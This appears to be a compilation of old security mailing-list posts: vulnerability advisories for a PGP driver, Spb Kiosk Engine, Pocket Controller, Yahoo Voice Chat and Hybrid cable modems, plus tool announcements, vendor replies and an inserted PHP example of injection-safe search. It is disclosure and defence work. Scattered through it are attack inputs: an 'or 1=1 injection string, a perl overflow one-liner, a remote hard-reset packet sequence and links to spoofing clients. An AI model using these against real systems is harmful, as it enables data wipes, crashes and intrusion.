PGP Desktop's PGPwded.sys Driver does not sanitize user supplied input (IOCTL) and this leads to a Driver Collapse that propagates on the system with a BSOD. Affected IOCTL is 0x80022038.

Proof-of-Concept:
http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service_POC.php

Credit:
Giuseppe 'Evilcry' Bonfa' (Team Lead, www.EvilFingers.com / http://evilcry.netsons.org)

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
---
Re: PHPSlideShow (toonchapter8.php) Cross-Site Scripting Vulnerability
The file specified ("toonchapter8.php") has NEVER existed in FMDeluxe or any other script created by WSDeluxe. This is a false vulnerability report, and should be removed.
WASC-Articles: 'The Importance of Application Classification in Secure Application Development'
The Web Application Security Consortium is proud to present 'The Importance of Application Classification in Secure Application Development' by Rohit Sethi. In this article Rohit describes the importance of Application Classification during the secure development process.

This document can be found at http://www.webappsec.org/projects/articles/ .

Regards,
- Robert Auger
articles_at_webappsec.org
http://www.webappsec.org

Are you interested in writing a 'Guest Article' for the WASC? Additional information on article guidelines may be found at http://www.webappsec.org/articles/. Inquiries can be sent to articles_at_webappsec.org

"Contributed articles may include industry best practices, technical information about current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR MARKETING GIMMICKS PLEASE. We are only soliciting concrete information from the experts on the front lines of the web application security field."

http://www.webappsec.org
Metaeye Released - ZmbScap
Team Metaeye has released new project Zmbscap as:

The zombie scapper is an automated perl tool for detecting and stopping distributed denial of service programs. The tool automatically searches and scans the desired target for programs by looking for the ports that are used by the zombie masters. It stops the zombie masters by sending a kill/stop trigger.

You can find the tool at: http://www.metaeye.org

- [MSG]
Metaeye Security Group
http://www.metaeye.org
Re: DotClear v1.2.5
So what? Even with register_globals = On it ends with a PHP error, nothing more. Where's your exploit? There's nothing on your site. I may have missed something and I'd like to thank you for warning us before the rest of the world.

--
Olivier Meunier
SQID v0.2 - SQL Injection Digger.
SQL injection digger is a command line program that looks for SQL injections and common errors in websites. The current version looks for SQL injections and common errors in website URLs found by performing a Google search. The use of the Google search SOAP API has been removed since keys are no longer issued. Now it directly performs the search over the web.

Sqid can be downloaded from http://sqid.rubyforge.org.

--
MSG // http://www.metaeye.org
SQID v0.1 - SQL Injection Digger.
SQL injection digger is a command line program that looks for SQL injections and common errors in websites. The current version looks for SQL injections and common errors in website URLs found by performing a Google search.

Sqid can be downloaded from http://sqid.rubyforge.org.

--
MSG // http://www.metaeye.org
Re: AFCommerce Shopping Cart
Hi, thank you for reporting this problem. I am Paul, the author of the software, so I would like to do everything possible to correct this issue. The free version of my software is not open source, and not that the encryption is protecting it very well, I'm sure a good hacker could crack the encryption, but the point is to not let the security features be readable to everyone, so hopefully it will lessen problems like this. Ok, so with that said, I tested the classic 'or 1=1 on my demo store, and nothing was returned. It said no matching results, so are you sure this worked for you? I know I am not perfect in any way so I will always look into this stuff, but when I first read your post I was confused because I attacked my own site for hours checking for that exact kind of attack. I don't like to publicly post too much info about how and why I set things up, as to not give anyone any ideas on how to attack my software, but the search feature (I thought) would not be attackable. Now since you did it already, I may be wrong, but I do not use the keywords inside the sql statement. For example, I do not use anything like: select * from products where name = 'userinputvariable'. I have some security functions set up to clean user input, if you know the software, it's afc_secure_string_POST. In the search script, I use that function for all input EXCEPT the keywords, but that is because the keywords are not used at all in sql statements (actually none of the input is). Basically, I break the keywords down into separate words (explode by spaces), then I do my own sql select statements (without any user input at all) and simply check to see if the words match. There is more to my search than that, but for this topic that is all that matters. So if someone were to type in any sql injection code, that code would never be queried.
Your 'or 1=1 would simply be stored in an array, in your example it would consider it 2 different words (if you didn't use the space it would be one keyword), but the only time that word would be used is in a substr_count statement, which can not do any damage. If this problem does exist, please report back what I am missing from your comment, but since it did not work for me just now, and also since the keywords never hit an sql statement, at this point I will disagree with you. Also make sure you did this on my current demo store, which uses version 2.5. I know that version 1 sucked as far as validation was concerned. I first released the code just to see if anyone would use it, so it was done quickly, but after I had a small following, I added a whole bunch of security features in version 2, and validated EVERYTHING (I hope). Feel free to mess with my demo store, http://crinicart.com, just please do not attack my server or do any damage. As for now, I see your comments as helping the project find holes, which is great, I do want it to be perfect. So if you find something I will be more than willing to listen, just please do not do any damage to prove a point. It's not necessary since I will try out anything that comes up. Your second point about the reviews, I am about to test that now. With this, you are probably correct. I had more validation in there, but people complained when I did that because they couldn't add html. I thought text only was fine, but I wanted to make people happy. I am probably going to take out all < and > symbols. It does check for normal php tags, but I guess someone could still use a script html tag for php attacks. So since it currently allows html I agree someone could deface the site, but only when reading the attacked review, and since most users do not use that feature, I didn't see it as a big deal. Also, the review is escaped with mysql_real_escape_string and a few other things.
The only way this could be perfect is to strip all html tags, and that was already in my mind to do. I'd like to hear what you think, as well as anyone else with an opinion about your comments (and mine). If a problem is found, it will be fixed the next day, but it's tough to be the only developer of software used by many people because I get all kinds of developers telling me something is written poorly just to feel better about themselves. You sound like you know what you are talking about, so I took your comments seriously. If you are correct, like I said I will fix it and thank you. If you are not, I would like to clear it up so my users do not become scared, or hurt my credibility. Thank you, Paul Crinigan
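The search design described in the reply above (keywords exploded on spaces, a fixed SELECT with no user input, matching done with substr_count) and the review fix it considers (strip every HTML tag), as an added PHP example that is not CriniCart's own code. The products table, its columns, the PDO handle and PHP 7.4 or later are assumptions made for the example.

```php
<?php
// Added example, not CriniCart code: mirrors the post's search design, where
// keywords never reach SQL. Table/column names and the PDO handle are assumed.
declare(strict_types=1);

/** Explode the raw search string on spaces and drop empty words. */
function keywordsFromQuery(string $raw): array
{
    $words = explode(' ', trim($raw));
    return array_values(array_filter($words, fn(string $w): bool => $w !== ''));
}

/**
 * Match rows from a fixed query against the keywords with substr_count.
 * "'or 1=1" becomes the literal words "'or" and "1=1"; no SQL ever sees them.
 */
function matchProducts(array $rows, array $keywords): array
{
    $hits = [];
    foreach ($rows as $row) {
        $haystack = strtolower($row['name'] . ' ' . $row['description']);
        $score = 0;
        foreach ($keywords as $kw) {
            $score += substr_count($haystack, strtolower($kw));
        }
        if ($score > 0) {
            $row['score'] = $score;
            $hits[] = $row;
        }
    }
    usort($hits, fn(array $a, array $b): int => $b['score'] <=> $a['score']);
    return $hits;
}

/** The query text is constant; user input is only ever compared in PHP. */
function searchProducts(PDO $db, string $rawQuery): array
{
    $stmt = $db->query('SELECT id, name, description FROM products');
    return matchProducts($stmt->fetchAll(PDO::FETCH_ASSOC), keywordsFromQuery($rawQuery));
}

/**
 * Review text: strip every tag on input and encode on output. Escaping for
 * MySQL (mysql_real_escape_string) only protects the INSERT, not the page
 * that later renders the review to other visitors.
 */
function sanitizeReviewInput(string $review): string
{
    return trim(strip_tags($review));
}

function renderReview(string $storedReview): string
{
    return htmlspecialchars($storedReview, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed sample rows standing in for the fixed query's result.
$sampleRows = [
    ['id' => 1, 'name' => 'Red Widget', 'description' => 'A small red widget'],
    ['id' => 2, 'name' => 'Blue Gadget', 'description' => 'Gadget, blue'],
];
$injected = matchProducts($sampleRows, keywordsFromQuery("'or 1=1"));
$normal   = matchProducts($sampleRows, keywordsFromQuery('red widget'));
printf("injection string matched %d rows, normal search %d rows\n", count($injected), count($normal));
echo renderReview(sanitizeReviewInput('Nice <script>alert(1)</script> product')), "\n";
```

The injection string scores zero against every row because it is compared as plain text, while the review path shows why escaping for the database and encoding for the browser are two separate controls.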
Re: vbulletin.com Multiple XSS Vulnerabilities
These XSS vulnerabilities have all been detected and patched.
Announcement: The Web Hacking Incidents Database
"The web hacking incident database (WHID) is a Web Application Security Consortium project dedicated to maintaining a list of web applications related security incidents. The goal is to serve as a tool for raising awareness of the web application security problem and provide the information for statistical analysis of web applications security incidents." Link: http://www.webappsec.org/projects/whid/ For further information please contact Ofer Shezaf ([EMAIL PROTECTED]), the project leader. Regards, - Robert Auger contact__at_webappsec.org http://www.webappsec.org - The Web Security Mailing List http://www.webappsec.org/lists/websecurity/ The Web Security Mailing List Archives http://www.webappsec.org/lists/websecurity/archive/
Announcement: WASC Threat Classification in German
Web Application Security Consortium (WASC) Announcement We're proud to present the German translation of the Threat Classification. On behalf of WASC, we'd like to thank the following for their hard work and contribution: Achim Hoffmann Albert Caruana Stefan Strobel Daniela Strobel Download: http://www.webappsec.org/projects/threat/ Regards, - Robert Auger [EMAIL PROTECTED] - The Web Security Mailing List http://www.webappsec.org/lists/websecurity/ The Web Security Mailing List Archives http://www.webappsec.org/lists/websecurity/archive/
Announcement: Domain Contamination By Amit Klein
The Web Application Security Consortium is proud to present 'Domain Contamination' written by Amit Klein. In this article Amit discusses how an attacker who's hijacked a domain for a short period of time can still retain control of its audience long after the domain is returned to its rightful owner. This document can be found at http://www.webappsec.org/projects/articles/020606.shtml Regards, - Robert Auger articles_at_webappsec.org http://www.webappsec.org Are you interested in writing a 'Guest Article' for the WASC? Additional information on article guidelines may be found at http://www.webappsec.org/articles/. Inquiries can be sent to articles_at_webappsec.org "Contributed articles may include industry best practices, technical information about current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR MARKETING GIMMICKS PLEASE. We are only soliciting concrete information from the experts on the front lines of the web application security field." http://www.webappsec.org
Announcement: The Web Application Firewall Evaluation Criteria v1 Released
The Web Application Firewall Evaluation Criteria project is proud to announce v1.0 of The Web Application Firewall Evaluation Criteria (WAFEC), its first official release. WAFEC is a result of a collaboration between web application firewall vendors and independent security professionals to create a comprehensive, vendor-neutral, web application firewall evaluation criteria. The resulting framework can be used to evaluate and compare web application firewalls. WAFEC v1.0 can be downloaded from the project home page: http://www.webappsec.org/projects/wafec/ Participation in WAFEC is open to interested parties. To comment on the work done so far or join the effort contact Ivan Ristic, the WAFEC project leader. Regards, [EMAIL PROTECTED] - The Web Security Mailing List http://www.webappsec.org/lists/websecurity/ The Web Security Mailing List Archives http://www.webappsec.org/lists/websecurity/archive/
Airscanner Mobile Security Advisory #05083102 Spb Kiosk Engine Program Bypass
Airscanner Mobile Security Advisory #05083102: Spb Kiosk Engine Program Bypass
Product: Kiosk Engine 1.0.0.1
Platform: Tested on Windows Mobile Pocket PC 2003
Requirements: Mobile device running Windows Mobile Pocket PC with Kiosk Engine 1.0.0.1 installed
Credits: Seth Fogie, Airscanner Mobile Security http://www.airscanner.com, Mobile Antivirus Researchers Association http://www.mobileav.org
August 30 2005
Risk Level: Medium. Local attacker gains unauthorized control over device.
Summary: Spb Kiosk Engine allows you to run your custom application(s) in kiosk mode. In this mode, the target applications are the only ones that can be used on a specific Pocket PC device.
Details: The core Kiosk Engine is executed from the \windows\startup folder when the PDA boots. This ensures that the device is locked down and basically keeps a person from using other programs on the PDA. However, it is still possible to execute programs via 'features' of the running application (eg. Pocket Word will execute programs via hyperlink - file://\windows\calc.exe). In addition, autorun is still enabled on the devices, which allows anyone with a SD Card or CF card to execute their own code on the device. Using this backdoor, we were able to overwrite the administrator passcode and alternately, remove the KioskEngine software altogether.
Workaround: Disable autorun on the device by placing an autorun.exe file in the \windows directory with read-only options.
Vendor Response: Waiting response.
Weblinks for advisories 05083101 and 05083102: http://www.airscanner.com/security/05083101_kioskpass.htm http://www.airscanner.com/security/05083102_kioskremove.htm
Copyright (c) 2005 Airscanner Corp. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Airscanner Corp. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please contact Airscanner Corp. for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use on an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Airscanner Mobile Security Advisory #05083101 Spb Kiosk Engine Administrator Password & Information Disclosure
Airscanner Mobile Security Advisory #05083101: Spb Kiosk Engine Administrator Password & Information Disclosure (Local)
Product: Kiosk Engine 1.0.0.1
Platform: Tested on Windows Mobile Pocket PC 2003
Requirements: Mobile device running Windows Mobile Pocket PC with Kiosk Engine 1.0.0.1 installed
Credits: Seth Fogie, Airscanner Mobile Security http://www.airscanner.com, Mobile Antivirus Researchers Association http://www.mobileav.org
August 30 2005
Risk Level: Medium. Local attacker gains unauthorized control over device.
Summary: Spb Kiosk Engine allows you to run your custom application(s) in kiosk mode. In this mode, the target applications are the only ones that can be used on a specific Pocket PC device.
Details: Kiosk Engine allows an administrator to enter their passcode to gain full control over a PDA with the Kiosk Engine installed. This passcode is stored in the registry as plaintext and can be obtained several different ways (eg. remote registry access).
Workaround: None
Vendor Response: Waiting response.
Online Advisory: http://www.airscanner.com/security/05083101_kioskpass.htm
Copyright (c) 2005 Airscanner Corp. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Airscanner Corp. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please contact Airscanner Corp. for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use on an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Airscanner Mobile Security Advisory: Remote Hard Reset Data Wipe and DoS of Pocket Controller v5.0 (#AS05080401)
- Airscanner Mobile Security Advisory: (#AS05080401) (Critical) - Remote Hard Reset Data Wipe and DoS of Pocket Controller v5.0 (#AS05080401)
Date of discovery: August 4, 2005
Product: Pocket Controller-Professional V5 (latest edition)
Platform: Windows Mobile .NET, Windows Mobile Pocket PC
Requirements: Windows Mobile
Credits: Jonathan Read (CISSP) and Seth Fogie, Airscanner Mobile Security www.airscanner.com, Mobile Antivirus Researcher's Association http://www.mobileav.org/
Severity: Medium to High since any PDA running the application can be “hard reset” (up to complete loss of all data and installed applications) using a remote connection. This vulnerability can also be exploited over a wireless connection.
Summary: Pocket Controller Professional is a popular, powerful remote control and management program that allows a user to remotely control a PDA from their PC computer. See http://www.soti.net/ for more information. Several features of this program are that it can remotely turn off, reboot, and reset the PDA. We discovered that these commands can be performed without the client program, by sending only three packets to the target PDA.
Details: Connect to port 5492 on PDA that is running the target client program. First send an initialization packet to the PDA. Next send a packet containing the desired command (turn off, reboot, hard reset) to the PDA. Finally, create a new socket and reset the initialization packet. Upon receipt, the PDA will perform the selected function. PoC is available for MARA members.
Workaround: No work around available.
Initial Vendor Notification: August 4, 2005
Initial Vendor Response: Awaiting response.
Legal: Copyright (c) 2005 Airscanner Corp. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Airscanner Corp. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please contact Airscanner Corp. for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use on an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
This advisory can be viewed online at http://www.airscanner.com/security/pocketcontroller.htm
Mobile Antivirus Researchers Assoc. Call for White Papers
### Call for White Papers ### The Journal of Computer Virology in association with the Mobile Antivirus Researchers Assoc. invites authors to discuss the state of the art of malware and anti-malware technologies and security issues for mobile environments. Authors are invited to submit full technical papers of up to 25 pages presenting novel and mature research results. Papers will be reviewed and papers accepted will be published in a Special Issue of the Journal of Computer Virology. For more information please visit http://www.mobileav.org - M.A.R.A is a vendor neutral organization with no commercial agenda. Our organization is completely non-profit and our members come from the global community of professional researchers.
Yahoo! Security Advisory: Yahoo! Voice Chat
- Yahoo! Security Advisory
Subject: Yahoo! Voice Chat Control: buffer overflow
Announced: 2003-05-30
Affects: Yahoo! Audio Conferencing versions prior to 1,0,0,45 running on any version of Microsoft Windows
Corrected: 2003-05-30
1. Background
Yahoo! Audio Conferencing (commonly known as Yahoo! Voice Chat) is a feature shared by Yahoo! Chat (a web-based service) and Yahoo! Messenger (a win32 client application).
2. Problem Description
A buffer overflow exists in the Yahoo! Audio Conferencing control that is shared by Yahoo! Messenger and Yahoo! Chat.
3. Impact
It may be possible for a remote attacker who can get a user to view malicious html code, most likely executed by getting a user to visit their Web page, to cause the user to be involuntarily logged out of chat, crash the user's browser, or potentially introduce executable code. To our knowledge, there have not been any executable code exploits related to this issue.
4. Solution
An updated Yahoo! Audio Conferencing control must be installed. The CLSID of the control is 2B323CD9-50E3-11D3-9466-00A0C9700498 and the corrected version number is 1,0,0,45. Users can test if they need to upgrade and install the update by visiting http://messenger.yahoo.com/messenger/security Yahoo! Messenger users will be prompted to update upon sign-in. Yahoo! Chat users will be served the new ActiveX control when entering a chat room. The update page will also be linked to from the Yahoo! Chat and Yahoo! Messenger home pages.
5. Workaround
The control can be disabled by removing the object from the Internet Explorer "Downloaded Program Files" cache and, if Yahoo! Messenger is installed, going into the Yahoo! Messenger directory (by default, C:\Program Files\Yahoo!\Messenger\) and running the following command: regsvr32 /u yacscom.dll
6. Acknowledgments
Cesar <[EMAIL PROTECTED]> discovered and reported this vulnerability.
KSR[T] Advisories #012: Hybrid Network's Cable Modems
KSR[T] Security Advisories http://www.ksrt.org
Contact Account: [EMAIL PROTECTED]
Advisory Subscription: Send an empty message to: [EMAIL PROTECTED]
KSR[T] Advisory #012
Date: Oct. 6 1999
ID #: hybr-hsmp-012
Affected Program: Hybrid Network's Cable Modems
Author: David Goldsmith <[EMAIL PROTECTED]>
Summary: Remote attackers can anonymously reconfigure any Hybrid Network's cable modem that is running HSMP. This can be used to steal information and login/password pairs from cable modem users.
Problem Description: Hybrid Network's cable modems can be configured via a UDP based protocol called HSMP. This protocol does not require any authentication to perform configuration requests. Since UDP is easily spoofed, configuration changes can be made anonymously.
Compromise: There are a plethora of denial of service attacks involving bad configuration settings (ethernet interfaces set to non-routable IP addresses, et al). HSMP can also be used to configure the DNS servers used by cable modem users, allowing attackers to redirect cable modem subscribers to a trojan site. More complex and theoretical attacks could involve the running of actual code through the debugging interface. This might allow remote attackers to deploy ethernet sniffers on the cable modem.
Notes: KSR[T] found this vulnerability in parallel with Paul S. Cosis <[EMAIL PROTECTED]> and the l0pht. We would like to thank them for their input to this advisory.
Patch/Fix: Cable providers should block out HSMP traffic (/udp) on their firewalls.
Links: KSR[T] had initially written a demonstration HSMP client which is located at: http://www.ksrt.org/ksrt-hsmp.tar.gz There is also another HSMP client located at: http://www.larsshack.org/sw/ccm/ l0pht modified the above client and added the ability to spoof the source address, allowing for the anonymous reconfiguration of Hybrid cable modems. Their client is located at: http://c0re.l0pht.com/~sili/ccm-spoof.tar.gz
Re: your mail
This bug was initially found a year and a half ago. Please refer to http://www.ksrt.org/adv7.html. Filter is no longer a supported application and should not be used.
KSR[T]

On Thu, 9 Sep 1999, Mark Ultor wrote:
> I've found a bug in filter on Elm 2.4 PL25. filter got SGID on mail group.
>
> sowatech:~$ filter -f `perl -e ' print "A" x 5000'`
> Segmentation fault
>
> btw in elm bugs r everywhere better don't use it
>
> Greeetz
> ___
> Ultor [[EMAIL PROTECTED]] - Network Security Adviser
> " I hack the heads of little girls and put them on my wall "
>
> --
> Sent via the Web Mail System.
> http://www.sowatech.com.pl/